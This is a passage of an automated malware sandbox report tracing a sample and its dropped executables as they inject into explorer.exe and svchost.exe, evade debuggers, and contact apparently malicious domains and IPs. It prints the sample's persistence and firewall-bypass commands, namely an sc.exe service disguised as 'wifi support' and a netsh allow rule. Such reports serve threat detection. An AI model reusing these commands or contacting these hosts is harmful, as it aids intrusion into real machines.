                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\ttfssdiSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00435AD0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0073C84B push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00640042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_0217092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_02170D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\ttfssdiProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0042C050 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0042CF12 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00419EAD SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 26_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeMemory protected: page guard
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0042C050 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_004288C0 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0043ADB0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_00422EA0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: 21_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00423040 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_0042C1F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00428A60 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_0043AF50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.101.24.0 25
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: 1523.exe.4.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\ttfssdiSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\ttfssdiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processesShow sources
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 2EE0000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeMemory written: C:\Users\user\AppData\Local\Temp\6B9B.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeMemory written: C:\Users\user\AppData\Local\Temp\8058.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EE0000 value starts with: 4D5A
                      Contains functionality to inject code into remote processesShow sources
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: 23_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeThread created: C:\Windows\explorer.exe EIP: 30E1930
                      Source: C:\Users\user\AppData\Roaming\ttfssdiThread created: unknown EIP: 5DE1930
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeThread created: unknown EIP: B611930
                      Writes to foreign memory regionsShow sources
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EE0000
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30A5008
                      .NET source code references suspicious native API functionsShow sources
                      Source: 8058.exe.4.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 8058.exe.4.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.2.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.2.8058.exe.d00000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 31.0.8058.exe.d00000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.0.8058.exe.d00000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 31.0.8058.exe.d00000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.0.8058.exe.d00000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 31.0.8058.exe.d00000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 31.0.8058.exe.d00000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 31.0.8058.exe.d00000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 31.0.8058.exe.d00000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeProcess created: C:\Users\user\Desktop\GNXG5XLBEH.exe "C:\Users\user\Desktop\GNXG5XLBEH.exe"
                      Source: C:\Users\user\AppData\Roaming\ttfssdiProcess created: C:\Users\user\AppData\Roaming\ttfssdi C:\Users\user\AppData\Roaming\ttfssdi
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6604 -ip 6604
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 520
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeProcess created: C:\Users\user\AppData\Local\Temp\6B9B.exe C:\Users\user\AppData\Local\Temp\6B9B.exe
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\evjgtzc.exe" C:\Windows\SysWOW64\ceaplexz\
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ceaplexz binPath= "C:\Windows\SysWOW64\ceaplexz\evjgtzc.exe /d\"C:\Users\user\AppData\Local\Temp\77CC.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ceaplexz "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ceaplexz
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeProcess created: C:\Users\user\AppData\Local\Temp\8058.exe C:\Users\user\AppData\Local\Temp\8058.exe
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000004.00000000.279647475.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.291979845.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.278080230.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.295925695.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.263975759.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: explorer.exe, 00000004.00000000.287836903.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.271133423.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.254965635.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
                      Source: explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: explorer.exe, 00000004.00000000.288173104.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.255131979.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.271452394.0000000001640000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.355603743.0000000000CE0000.00000002.00020000.sdmp, 5BBC.exe, 00000015.00000000.357326837.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\5BBC.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\6B9B.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8058.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8058.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\ceaplexz\evjgtzc.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0041A10A __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\6BA5.exeCode function: 28_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeCode function: 30_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\Desktop\GNXG5XLBEH.exeCode function: 0_2_0041A10A __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Uses netsh to modify the Windows network and firewall settingsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Modifies the windows firewallShow sources
                      Source: C:\Users\user\AppData\Local\Temp\77CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
